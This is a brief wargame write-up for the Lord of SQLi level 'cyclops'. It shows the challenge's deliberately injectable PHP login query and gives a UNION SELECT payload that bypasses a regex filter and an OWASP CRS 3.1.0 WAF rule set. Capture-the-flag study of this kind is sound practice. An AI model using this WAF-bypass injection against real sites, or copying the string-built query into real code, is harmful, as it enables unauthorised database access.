Post

LOS Lv.36 cyclops

Wargame, rubiya
Posted

cyclops

1
2
3
4
5
6
7
8
9
10
11
12
13
14

query : select id,pw from prob_cyclops where id='' and pw=''

<?php
  include "./config.php";
  login_chk();
  $db = dbconnect();
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[id])) exit("No Hack ~_~");
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
  $query = "select id,pw from prob_cyclops where id='{$_GET[id]}' and pw='{$_GET[pw]}'";
  echo "<hr>query : <strong>{$query}</strong><hr><br>";
  $result = @mysqli_fetch_array(mysqli_query($db,$query));
  if(($result['id'] === "first") && ($result['pw'] === "second")) solve("cyclops");//must use union select
  highlight_file(__FILE__);
?>

Solution

1
2
3

CRS 3.1.0 WAF bypass -> {`a` b}, <@

?id=' <@ union/**/select 'first','second' %23
Wargame, rubiya
This post is licensed under CC BY 4.0 by the author.